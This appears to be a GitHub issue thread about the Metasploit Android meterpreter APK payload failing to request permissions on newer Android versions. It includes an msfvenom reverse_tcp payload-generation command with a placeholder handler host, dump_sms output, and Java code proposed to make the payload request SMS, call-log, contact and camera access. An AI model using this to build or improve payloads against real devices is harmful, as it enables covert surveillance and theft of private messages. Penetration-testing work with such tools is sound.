msfvenom APK payload doesn't currently ask for permissions after installing

[MR-AMDEV]

Steps to reproduce

1. Generate a apk payload
2. Run on android OS above marshellow(6.0)

Expected behavior

After installation, On app startup the payload app should ask for all the relative permissions(calls,sms,logs etc.) as this is the new policy from google on OS above 6.0

Current behavior

It just doesn't ask and thats why most of the options from meterpreter does not work for example for dump_sms it will produce dump_sms: Operation failed: 1 But after going to app settings and allowing the sms permission, it works.

Metasploit version

Framework: 5.0.85-dev
Console  : 5.0.85-dev

OS

Kali linux 2020.1b

Target System

Android 9.0(pie) on Realme 3

[gwillcox-r7]

@abdulmanan0315 Please update your Metasploit Version section by opening msfconsole and then typing in version. You should see something similar to the following:

msf5 > version
Framework: 5.0.87-dev-779d2cade4
Console  : 5.0.87-dev-779d2cade4
msf5 > 

This is much more helpful to us than "latest as of 2020" as thats something that is constantly changing. If we look at this issue in 2 months time, no one is going to know what "latest as of 2020" is and you will have likely forgotten which version you were using.

Thanks!

[MR-AMDEV]

@abdulmanan0315 Please update your Metasploit Version section by opening msfconsole and then typing in version. You should see something similar to the following:

msf5 > version
Framework: 5.0.87-dev-779d2cade4
Console  : 5.0.87-dev-779d2cade4
msf5 > 

This is much more helpful to us than "latest as of 2020" as thats something that is constantly changing. If we look at this issue in 2 months time, no one is going to know what "latest as of 2020" is and you will have likely forgotten which version you were using.

Thanks!

I am sorry for not mentioning that version, as i was just a bit lazy to start my vm .
By the way i have updated the question and my version is

Framework: 5.0.85-dev
Console  : 5.0.85-dev

[gwillcox-r7]

@abdulmanan0315 Thanks, latest version at the time of writing is 5.0.87-dev, but I just wanted to make sure you weren't too far behind the latest updates.

Unfortunately I don't have an Android device that I could test this out on; I'll add the needs-testing tag so that hopefully someone else with a better setup can pick this up and try help out with your issue a bit better.

[gwillcox-r7]

@abdulmanan0315 Also updated the title to help better describe your issue, but let me know if this isn't appropriate.

[MR-AMDEV]

@gwillcox-r7 It isn't required to have an android device to test. You can test it on an Emulator or an you can use http://appetize.io/ to test.
I think the MainActivity class of apk payload should have something like this so that it asks for permissions on app startup(i tested this code while forming a basic app in android studio).
Do you know where to put this code in apk payload? I don't know about its structure. But i think we all can figure it out.

       // Call to the function
        int PERMISSION_ALL = 1;
        String[] PERMISSIONS = {
                Manifest.permission.INTERNET,
                Manifest.permission.READ_SMS,
                Manifest.permission.READ_CALL_LOG,
                Manifest.permission.READ_CONTACTS,
                Manifest.permission.CAMERA,
                Manifest.permission.WRITE_EXTERNAL_STORAGE,
                Manifest.permission.READ_EXTERNAL_STORAGE,
                Manifest.permission.WAKE_LOCK,
        };

        if (!hasPermissions(this, PERMISSIONS)) {
            ActivityCompat.requestPermissions(this, PERMISSIONS, PERMISSION_ALL);
        }

    // Function to check and request permission.
    public static boolean hasPermissions(Context context, String... permissions) {
        if (context != null && permissions != null) {
            for (String permission : permissions) {
                if (ActivityCompat.checkSelfPermission(context, permission) != PackageManager.PERMISSION_GRANTED) {
                    return false;
                }
            }
        }
        return true;
    }

[MR-AMDEV]

Can anybody provide me the source code of metasploit apk payload ?

[timwr]

@abdulmanan0315 you can find it here: https://github.com/rapid7/metasploit-payloads/blob/master/java/androidpayload/app/src/com/metasploit/stage/MainActivity.java

[MR-AMDEV]

Can anybody please check the pull reqquest?

[gwillcox-r7]

@abdulmanan0315 Many other developers are currently busy with other PR requests that were added to the queue several weeks before your PR was. Please be patient and we will get to your PR when we can. Also it is the weekend here for many Metasploit developers so please keep this in mind.

[MR-AMDEV]

@gwillcox-r7 Ok i 'll wait with no issue

[timwr]

I can't reproduce this with the default output from msfvenom on pixel devices running Android 10.
msfvenom -p android/meterpreter/reverse_tcp LHOST=HANDLERIP LPORT=4444 -o met.apk
I get the following prompt when the app is installed:

Afterwards commands such as dump_sms work fine (on a Pixel XL2 running Android 10):

meterpreter > dump_sms
[*] Fetching 4 sms messages
[*] SMS messages saved to: sms_dump_20200513171721.txt
meterpreter > sysinfo
Computer    : localhost
OS          : Android 10 - Linux 4.4.177-g83bee1dc48e8 (aarch64)
Meterpreter : dalvik/android

@abdulmanan0315 how are you generating the payload? Do you see any prompts for permissions when you install the APK?

My understanding is that this only occurred when injecting into APKs with a recent a targetSdkVersion value.

[gsdaemon]

@timwr

My understanding is that this only occurred when injecting into APKs with a recent a targetSdkVersion value.

Exactly. When injected into an existing apk, the prompt will not show up after installing/opening the app.

[github-actions]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[Bardia-SG]

no solution found for this problem?

[legilimency31]

@timwr

My understanding is that this only occurred when injecting into APKs with a recent a targetSdkVersion value.

I tested the following sdkversion numbers in a injected apk on android 6,9 and 10 :
15, 22,23,24,25,28 and 29.
And for the android 6, if equal or higher then 23, no permission is requested on the instalation. But for android 9 and 10, no permission was ever request during instalation.

[karpiyon]

same here.
is there a solution for this?

[bcoles]

no solution found for this problem?
same here. is there a solution for this?

No solution. The issue is being tracked here: #16208.